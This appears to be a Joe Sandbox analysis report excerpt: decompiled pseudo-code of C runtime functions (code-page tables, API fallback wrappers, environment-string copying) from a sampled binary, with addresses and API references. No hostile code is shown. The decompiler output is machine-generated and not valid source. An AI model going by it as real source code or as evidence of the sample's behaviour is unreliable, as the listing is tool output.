0x0024acdc
0x0024acdf
0x0024acdf
0x0024ace5
0x0024ace7
0x00000000
0x0024ace8
0x0024acaf
0x0024acb8
0x0024acc7
0x0024acba
0x0024acbd
0x0024acc3
0x0024acc3
0x0024accb
0x00000000
0x0024accd
0x0024acd0
0x0024acd2
0x00000000
0x0024acd2
0x0024accb
0x0024ac87
0x0024ac8c
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,002410DD,00000000,00000000,?,0024AC18,002410DD,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue), ref: 0024ACA3
GetLastError.KERNEL32(?,0024AC18,002410DD,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000,00000364,?,0024847F), ref: 0024ACAF
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0024AC18,002410DD,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000), ref: 0024ACBD
FreeLibrary.KERNEL32(00000000,?,0024AC18,002410DD,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000,00000364), ref: 0024ACDF

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00249DB8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00249DB8(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x25b018; // 0x6083b07a
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0x24a403
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0x24a403
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E0024B619(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0x1415ff56
					E0024C844(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0x1415ff56
					E0024C844(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E00243541(_v8 ^ _t102);
			}

0x00249db8
0x00249dc3
0x00249dca
0x00249dcf
0x00249dda
0x00249dec
0x00249ee4
0x00249ee4
0x00249eea
0x00249eec
0x00249eed
0x00249eed
0x00249eef
0x00249ef5
0x00249ef5
0x00249ef7
0x00249ef9
0x00249f02
0x00249f05
0x00249f11
0x00249f18
0x00249f28
0x00249f1a
0x00249f1a
0x00249f1d
0x00249f1d
0x00249f1d
0x00249f21
0x00249f21
0x00000000
0x00249f21
0x00249f07
0x00249f07
0x00249f0c
0x00249f0c
0x00249f24
0x00249f24
0x00249f24
0x00249f2a
0x00249f30
0x00249f30
0x00249f36
0x00249f37
0x00249f37
0x00249df2
0x00249df2
0x00249df4
0x00249df4
0x00249dfb
0x00249dfc
0x00249e00
0x00249e06
0x00249e0c
0x00249e34
0x00249e34
0x00249e36
0x00000000
0x00000000
0x00249e15
0x00249e19
0x00249e2b
0x00249e2b
0x00249e2d
0x00000000
0x00000000
0x00249e1e
0x00249e20
0x00249e22
0x00249e2a
0x00249e2a
0x00000000
0x00249e2a
0x00000000
0x00249e20
0x00249e2f
0x00249e2f
0x00249e32
0x00249e32
0x00249e39
0x00249e4e
0x00249e54
0x00249e68
0x00249e6f
0x00249e7e
0x00249e90
0x00249e97
0x00249e9f
0x00249ea1
0x00249ea1
0x00249eab
0x00249ebb
0x00249ebd
0x00249ed4
0x00249ebf
0x00249ebf
0x00249ebf
0x00249ebf
0x00249ec4
0x00000000
0x00249ec4
0x00249ead
0x00249ead
0x00249eb2
0x00249ecb
0x00249ecb
0x00249ecb
0x00249edb
0x00249edc
0x00249ee0
0x00249f4b

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00249DDD

Part of subcall function 0024B619: MultiByteToWideChar.KERNEL32(?,00000000,E9E85006,002449A0,00000000,00000000,002451CE,?,002451CE,?,00000001,002449A0,E9E85006,00000001,002451CE,002451CE), ref: 0024B666
Part of subcall function 0024B619: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0024B6EF
Part of subcall function 0024B619: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0024B701
Part of subcall function 0024B619: __freea.LIBCMT ref: 0024B70A

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

Strings

, xrefs: 00249E22

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00243FF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
library

C-Code - Quality: 88%

			E00243FF2(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t34;
				intOrPtr* _t35;

				_t20 = 0x2617dc + _a4 * 4;
				asm("lock cmpxchg [ebx], ecx");
				_t28 =  *0x25b018; // 0x6083b07a
				_t30 = _t29 | 0xffffffff;
				_t34 = _t28 ^ 0;
				asm("ror esi, cl");
				if(_t34 == _t30) {
					L14:
					return 0;
				}
				if(_t34 == 0) {
					_t35 = _a12;
					if(_t35 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t30 ^ _t28;
							goto L14;
						}
						_t34 = GetProcAddress(_t13, _a8);
						if(_t34 == 0) {
							_t28 =  *0x25b018; // 0x6083b07a
							goto L13;
						}
						 *_t20 = E00243FD3(_t34);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00244092( *_t35); // executed
						if(_t13 != 0) {
							break;
						}
						_t35 = _t35 + 4;
						if(_t35 != _a16) {
							continue;
						}
						_t28 =  *0x25b018; // 0x6083b07a
						goto L7;
					}
					_t28 =  *0x25b018; // 0x6083b07a
					goto L8;
				}
				L2:
				return _t34;
			}

0x00243ffd
0x00244006
0x0024400a
0x00244010
0x0024401a
0x0024401c
0x00244020
0x0024408b
0x00000000
0x0024408b
0x00244024
0x0024402a
0x00244030
0x0024404c
0x0024404c
0x0024404e
0x00244050
0x0024407b
0x0024407d
0x00244085
0x00244089
0x00000000
0x00244089
0x0024405c
0x00244060
0x00244075
0x00000000
0x00244075
0x00244069
0x00000000
0x00000000
0x00000000
0x00000000
0x00244032
0x00244032
0x00244034
0x0024403c
0x00000000
0x00000000
0x0024403e
0x00244044
0x00000000
0x00000000
0x00244046
0x00000000
0x00244046
0x0024406d
0x00000000
0x0024406d
0x00244026
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx,00254324,InitializeCriticalSectionEx,00000000,?,00243F7E,H}W,00000FA0), ref: 00244056

Part of subcall function 00244092: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,H}W,?,?,00244039,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx), ref: 002440CA
Part of subcall function 00244092: GetLastError.KERNEL32(?,?,00244039,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx,00254324,InitializeCriticalSectionEx,00000000,?,00243F7E), ref: 002440D6
Part of subcall function 00244092: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00244039,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx,00254324,InitializeCriticalSectionEx), ref: 002440E4
Part of subcall function 00244092: FreeLibrary.KERNEL32(00000000,?,?,00244039,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx,00254324,InitializeCriticalSectionEx,00000000), ref: 00244106

Strings

H}W, xrefs: 00243FFC

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024AF1D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47

C-Code - Quality: 30%

			E0024AF1D(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x25b018; // 0x6083b07a
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E0024ABD5(0x16, "LCMapStringEx", 0x255814, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E0024AFA5(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x254158(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E00243541(_v8 ^ _t33);
			}

0x0024af1d
0x0024af22
0x0024af23
0x0024af2a
0x0024af2d
0x0024af3f
0x0024af44
0x0024af4b
0x0024af8e
0x0024af4d
0x0024af6a
0x0024af70
0x0024af70
0x0024afa2

APIs

Part of subcall function 0024ABD5: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000,00000364,?,0024847F,00000000), ref: 0024AC35

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,E9E85006,00000001,?,000000FF), ref: 0024AF8E

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

Strings

LCMapStringEx, xrefs: 0024AF2E, 0024AF38

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024AEBB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34

C-Code - Quality: 20%

			E0024AEBB(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x25b018; // 0x6083b07a
				_v8 = _t8 ^ _t22;
				_t20 = E0024ABD5(0x14, "InitializeCriticalSectionEx", 0x25580c, 0x255814);
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
				} else {
					 *0x254158(_a4, _a8, _a12);
					 *_t20();
				}
				return E00243541(_v8 ^ _t22);
			}

0x0024aec0
0x0024aec1
0x0024aec8
0x0024aee2
0x0024aee9
0x0024af06
0x0024aeeb
0x0024aef6
0x0024aefc
0x0024aefc
0x0024af1a

APIs

Part of subcall function 0024ABD5: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000,00000364,?,0024847F,00000000), ref: 0024AC35

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?,00249129), ref: 0024AF06

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

Strings

InitializeCriticalSectionEx, xrefs: 0024AED6

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024AD60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

C-Code - Quality: 16%

			E0024AD60(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0x25b018; // 0x6083b07a
				_v8 = _t4 ^ _t18;
				_t6 = E0024ABD5(3, "FlsAlloc", 0x2557d0, 0x2557d8); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0x254158(_a4);
					 *_t16();
				}
				return E00243541(_v8 ^ _t18);
			}

0x0024ad65
0x0024ad66
0x0024ad6d
0x0024ad82
0x0024ad87
0x0024ad8e
0x0024ad9f
0x0024ad90
0x0024ad95
0x0024ad9b
0x0024ad9b
0x0024adb3

APIs

Part of subcall function 0024ABD5: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000,00000364,?,0024847F,00000000), ref: 0024AC35

TlsAlloc.KERNEL32 ref: 0024AD9F

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

Strings

FlsAlloc, xrefs: 0024AD7B

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 002441C4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25

C-Code - Quality: 68%

			E002441C4(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				intOrPtr* _t6;
				intOrPtr* _t10;

				_t6 = E00243FF2(8, "InitializeCriticalSectionEx", 0x254324, "InitializeCriticalSectionEx"); // executed
				_t10 = _t6;
				if(_t10 == 0) {
					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
				}
				L0024332D();
				return  *_t10(_a4, _a8, _a12);
			}

0x002441d9
0x002441de
0x002441e5
0x00000000
0x00244201
0x002441f2
0x00000000

APIs

Part of subcall function 00243FF2: GetProcAddress.KERNEL32(00000000,?,H}W,00000000,?,?,002441DE,00000008,InitializeCriticalSectionEx,00254324,InitializeCriticalSectionEx,00000000,?,00243F7E,H}W,00000FA0), ref: 00244056

InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,?), ref: 00244201

Strings

InitializeCriticalSectionEx, xrefs: 002441C8, 002441D2

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024A10D, Relevance: 3.2, APIs: 2, Instructions: 168

C-Code - Quality: 92%

			E0024A10D(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x25b018; // 0x6083b07a
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E00249CE0(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x25b1c0)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x25b1c0)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x261d0c - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00249D53(_t98);
												goto L37;
											}
										} else {
											E00243C20(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00249CA2( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00249DB8(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00243C20(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x25b1d0;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x25b1bc; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00249CA2(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x25b1c4;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E00249D53(_t98);
				}
				L39:
				return E00243541(_v8 ^ _t99);
			}

0x0024a115
0x0024a11c
0x0024a124
0x0024a12c
0x0024a131
0x0024a142
0x0024a142
0x0024a144
0x0024a146
0x0024a148
0x0024a14b
0x0024a14b
0x0024a151
0x00000000
0x00000000
0x0024a157
0x0024a158
0x0024a15b
0x0024a15e
0x0024a163
0x00000000
0x0024a165
0x0024a165
0x0024a16b
0x0024a239
0x0024a171
0x0024a171
0x0024a177
0x00000000
0x0024a17d
0x0024a181
0x0024a187
0x0024a189
0x00000000
0x0024a18f
0x0024a194
0x0024a19a
0x0024a19c
0x0024a226
0x0024a22c
0x00000000
0x0024a22e
0x0024a22f
0x00000000
0x0024a22f
0x0024a1a2
0x0024a1ac
0x0024a1b1
0x0024a1b9
0x0024a1bf
0x0024a1c0
0x0024a1c3
0x0024a216
0x0024a1c5
0x0024a1c5
0x0024a1c9
0x0024a1cc
0x0024a1ce
0x0024a1ce
0x0024a1d1
0x0024a1d3
0x00000000
0x00000000
0x0024a1d5
0x0024a1d8
0x0024a1e3
0x0024a1e3
0x0024a1e5
0x00000000
0x00000000
0x0024a1dd
0x0024a1e2
0x0024a1e2
0x0024a1e2
0x0024a1e7
0x0024a1ea
0x0024a1ed
0x00000000
0x00000000
0x00000000
0x0024a1ed
0x0024a1ce
0x0024a1ef
0x0024a1ef
0x0024a1f2
0x0024a1f7
0x0024a1f7
0x0024a1fa
0x0024a1fb
0x0024a1fb
0x0024a1fb
0x0024a20b
0x0024a211
0x0024a211
0x0024a21b
0x0024a21e
0x0024a21f
0x0024a220
0x0024a2e4
0x0024a2e5
0x0024a2ea
0x0024a2eb
0x0024a2eb
0x0024a19c
0x0024a189
0x0024a177
0x0024a16b
0x00000000
0x0024a2ed
0x0024a24b
0x0024a253
0x0024a253
0x0024a257
0x0024a25a
0x0024a260
0x0024a263
0x0024a263
0x0024a266
0x0024a268
0x0024a26a
0x0024a26a
0x0024a26d
0x0024a26f
0x00000000
0x00000000
0x0024a271
0x0024a274
0x0024a290
0x0024a290
0x0024a292
0x00000000
0x00000000
0x0024a279
0x0024a27f
0x0024a281
0x0024a287
0x0024a28b
0x0024a28b
0x0024a28c
0x00000000
0x0024a28c
0x00000000
0x0024a27f
0x0024a294
0x0024a297
0x0024a29a
0x00000000
0x00000000
0x00000000
0x0024a29a
0x0024a29c
0x0024a29c
0x0024a29f
0x0024a2a0
0x0024a2a3
0x0024a2a6
0x0024a2a6
0x0024a2ac
0x0024a2af
0x0024a2be
0x0024a2c7
0x0024a2cc
0x0024a2d2
0x0024a2d3
0x0024a2d3
0x0024a2d6
0x0024a2d9
0x0024a2dc
0x0024a2df
0x0024a2df
0x0024a2df
0x00000000
0x0024a133
0x0024a134
0x0024a13a
0x0024a2ee
0x0024a2fd

APIs

Part of subcall function 00249CE0: GetOEMCP.KERNEL32(00000000,?,?,00249F69,?), ref: 00249D0B
Part of subcall function 00249CE0: GetACP.KERNEL32(00000000,?,?,00249F69,?), ref: 00249D22

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00249FAE,?,00000000), ref: 0024A181
GetCPInfo.KERNEL32(00000000,00249FAE,?,?,?,00249FAE,?,00000000), ref: 0024A194

Part of subcall function 00249DB8: GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00249DDD

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024A4C3, Relevance: 3.0, APIs: 2, Instructions: 37

C-Code - Quality: 100%

			E0024A4C3(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0024A409(_t19) - _t19 >> 1) + (E0024A409(_t19) - _t19 >> 1);
					_t6 = E00246F07(_t14, (E0024A409(_t19) - _t19 >> 1) + (E0024A409(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E002523A0(_t18, _t19, _t12);
					}
					E00246ECD(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x0024a4c3
0x0024a4cd
0x0024a4d1
0x0024a4e2
0x0024a4e6
0x0024a4eb
0x0024a4f1
0x0024a4f6
0x0024a4fb
0x0024a500
0x0024a507
0x0024a4d3
0x0024a4d3
0x0024a4d3
0x0024a512

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0024A4C7

Part of subcall function 00246F07: RtlAllocateHeap.NTDLL(00000000,?,?,?,002429E9,?,?,002410DD,00000010), ref: 00246F39

Part of subcall function 00246ECD: HeapFree.KERNEL32(00000000,00000000), ref: 00246EE3
